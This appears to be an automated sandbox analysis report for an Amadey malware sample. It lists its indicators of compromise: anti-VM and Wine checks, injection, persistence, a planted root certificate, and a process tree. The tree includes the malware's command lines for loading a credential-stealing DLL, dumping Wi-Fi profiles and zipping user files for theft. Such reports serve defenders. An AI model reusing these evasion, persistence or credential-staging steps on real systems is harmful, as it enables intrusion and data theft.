amadey | e7e6ca554c8d9f081032c7f75c608e04af285586ba45bb1b7abef7ad3b212b57

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e7e6ca554c8d9f081032c7f75c608e04af285586ba45bb1b7abef7ad3b212b57.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f875465b3c.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	amert.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorgu.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
50	3588	rundll32.exe
72	5384	rundll32.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1300	netsh.exe
3096	netsh.exe

Checks BIOS information in registry 2 TTPs 14 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f875465b3c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e7e6ca554c8d9f081032c7f75c608e04af285586ba45bb1b7abef7ad3b212b57.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorgu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorgu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e7e6ca554c8d9f081032c7f75c608e04af285586ba45bb1b7abef7ad3b212b57.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f875465b3c.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Control Panel\International\Geo\Nation	e7e6ca554c8d9f081032c7f75c608e04af285586ba45bb1b7abef7ad3b212b57.exe
Key value queried	\REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Control Panel\International\Geo\Nation	explorha.exe
Key value queried	\REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Control Panel\International\Geo\Nation	c2ed9b0a1b.exe
Key value queried	\REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Control Panel\International\Geo\Nation	explorgu.exe
Key value queried	\REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Control Panel\International\Geo\Nation	NewB.exe

Executes dropped EXE 15 IoCs

pid	Process
1360	explorha.exe
3000	f875465b3c.exe
1724	explorha.exe
2244	amert.exe
5268	c2ed9b0a1b.exe
4776	explorha.exe
5180	explorgu.exe
6040	alexxxxxxxx.exe
2800	32456.exe
5812	goldprimeldlldf.exe
5064	propro.exe
5220	Traffic.exe
3588	NewB.exe
2156	swiiiii.exe
6436	koooooo.exe

Identifies Wine through registry keys 2 TTPs 7 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Software\Wine	explorgu.exe
Key opened	\REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Software\Wine	e7e6ca554c8d9f081032c7f75c608e04af285586ba45bb1b7abef7ad3b212b57.exe
Key opened	\REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Software\Wine	f875465b3c.exe
Key opened	\REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Software\Wine	amert.exe

Loads dropped DLL 5 IoCs

pid	Process
2240	rundll32.exe
3588	rundll32.exe
5384	rundll32.exe
6884	rundll32.exe
6920	rundll32.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x00070000000233e1-1130.dat	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f875465b3c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000042001\\f875465b3c.exe"	explorha.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
169	pastebin.com
167	pastebin.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
215	api.myip.com
216	api.myip.com
223	ipinfo.io
224	ipinfo.io

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000700000002333c-108.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

pid	Process
764	e7e6ca554c8d9f081032c7f75c608e04af285586ba45bb1b7abef7ad3b212b57.exe
1360	explorha.exe
3000	f875465b3c.exe
2244	amert.exe
1724	explorha.exe
4776	explorha.exe
5180	explorgu.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 1360 set thread context of 1724	1360	explorha.exe	106
PID 6040 set thread context of 4364	6040	alexxxxxxxx.exe	144
PID 5812 set thread context of 2516	5812	goldprimeldlldf.exe	150
PID 2156 set thread context of 6448	2156	swiiiii.exe	158
PID 6436 set thread context of 6732	6436	koooooo.exe	164

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\explorha.job	e7e6ca554c8d9f081032c7f75c608e04af285586ba45bb1b7abef7ad3b212b57.exe
File created	C:\Windows\Tasks\explorgu.job	amert.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
6540	2156	WerFault.exe	154
6788	6436	WerFault.exe	157
6620	4464	WerFault.exe	188
6324	6604	WerFault.exe	194

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
3232	schtasks.exe
1756	schtasks.exe
6596	schtasks.exe
6704	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133571874399267809"	chrome.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	32456.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	32456.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2640	PING.EXE

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
764	e7e6ca554c8d9f081032c7f75c608e04af285586ba45bb1b7abef7ad3b212b57.exe
764	e7e6ca554c8d9f081032c7f75c608e04af285586ba45bb1b7abef7ad3b212b57.exe
1360	explorha.exe
1360	explorha.exe
3000	f875465b3c.exe
3000	f875465b3c.exe
2244	amert.exe
2244	amert.exe
3588	rundll32.exe
3588	rundll32.exe
3588	rundll32.exe
3588	rundll32.exe
3588	rundll32.exe
3588	rundll32.exe
1724	explorha.exe
1724	explorha.exe
3588	rundll32.exe
3588	rundll32.exe
3588	rundll32.exe
3588	rundll32.exe
5508	chrome.exe
5508	chrome.exe
5648	powershell.exe
5648	powershell.exe
5648	powershell.exe
4776	explorha.exe
4776	explorha.exe
5180	explorgu.exe
5180	explorgu.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeDebugPrivilege	5648	powershell.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe
Token: SeCreatePagefilePrivilege	5508	chrome.exe
Token: SeShutdownPrivilege	5508	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
764	e7e6ca554c8d9f081032c7f75c608e04af285586ba45bb1b7abef7ad3b212b57.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
2244	amert.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe

Suspicious use of SendNotifyMessage 60 IoCs

pid	Process
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5508	chrome.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe
5268	c2ed9b0a1b.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 764 wrote to memory of 1360	764	e7e6ca554c8d9f081032c7f75c608e04af285586ba45bb1b7abef7ad3b212b57.exe	99
PID 764 wrote to memory of 1360	764	e7e6ca554c8d9f081032c7f75c608e04af285586ba45bb1b7abef7ad3b212b57.exe	99
PID 764 wrote to memory of 1360	764	e7e6ca554c8d9f081032c7f75c608e04af285586ba45bb1b7abef7ad3b212b57.exe	99
PID 1360 wrote to memory of 3000	1360	explorha.exe	105
PID 1360 wrote to memory of 3000	1360	explorha.exe	105
PID 1360 wrote to memory of 3000	1360	explorha.exe	105
PID 1360 wrote to memory of 1724	1360	explorha.exe	106
PID 1360 wrote to memory of 1724	1360	explorha.exe	106
PID 1360 wrote to memory of 1724	1360	explorha.exe	106
PID 1360 wrote to memory of 1724	1360	explorha.exe	106
PID 1360 wrote to memory of 1724	1360	explorha.exe	106
PID 1360 wrote to memory of 1724	1360	explorha.exe	106
PID 1360 wrote to memory of 1724	1360	explorha.exe	106
PID 1360 wrote to memory of 1724	1360	explorha.exe	106
PID 1360 wrote to memory of 1724	1360	explorha.exe	106
PID 1360 wrote to memory of 1724	1360	explorha.exe	106
PID 1360 wrote to memory of 1724	1360	explorha.exe	106
PID 1360 wrote to memory of 2244	1360	explorha.exe	109
PID 1360 wrote to memory of 2244	1360	explorha.exe	109
PID 1360 wrote to memory of 2244	1360	explorha.exe	109
PID 1360 wrote to memory of 2240	1360	explorha.exe	110
PID 1360 wrote to memory of 2240	1360	explorha.exe	110
PID 1360 wrote to memory of 2240	1360	explorha.exe	110
PID 2240 wrote to memory of 3588	2240	rundll32.exe	111
PID 2240 wrote to memory of 3588	2240	rundll32.exe	111
PID 3588 wrote to memory of 5140	3588	rundll32.exe	112
PID 3588 wrote to memory of 5140	3588	rundll32.exe	112
PID 1360 wrote to memory of 5268	1360	explorha.exe	114
PID 1360 wrote to memory of 5268	1360	explorha.exe	114
PID 1360 wrote to memory of 5268	1360	explorha.exe	114
PID 5268 wrote to memory of 5508	5268	c2ed9b0a1b.exe	115
PID 5268 wrote to memory of 5508	5268	c2ed9b0a1b.exe	115
PID 5508 wrote to memory of 5596	5508	chrome.exe	117
PID 5508 wrote to memory of 5596	5508	chrome.exe	117
PID 3588 wrote to memory of 5648	3588	rundll32.exe	118
PID 3588 wrote to memory of 5648	3588	rundll32.exe	118
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119
PID 5508 wrote to memory of 5852	5508	chrome.exe	119

C:\Users\Admin\AppData\Local\Temp\e7e6ca554c8d9f081032c7f75c608e04af285586ba45bb1b7abef7ad3b212b57.exe
"C:\Users\Admin\AppData\Local\Temp\e7e6ca554c8d9f081032c7f75c608e04af285586ba45bb1b7abef7ad3b212b57.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:764
- C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
  "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1360
- - C:\Users\Admin\AppData\Local\Temp\1000042001\f875465b3c.exe
    "C:\Users\Admin\AppData\Local\Temp\1000042001\f875465b3c.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    PID:3000
- - C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
    "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    PID:1724
- - C:\Users\Admin\AppData\Local\Temp\1000049001\amert.exe
    "C:\Users\Admin\AppData\Local\Temp\1000049001\amert.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    PID:2244
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2240
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
      4⤵
      Blocklisted process makes network request
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:3588
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        
        PID:5140
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\172592802658_Desktop.zip' -CompressionLevel Optimal
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5648
- - C:\Users\Admin\AppData\Local\Temp\1000051001\c2ed9b0a1b.exe
    "C:\Users\Admin\AppData\Local\Temp\1000051001\c2ed9b0a1b.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:5268
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video
      4⤵
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:5508
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa088f9758,0x7ffa088f9768,0x7ffa088f9778
        5⤵
        
        PID:5596
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
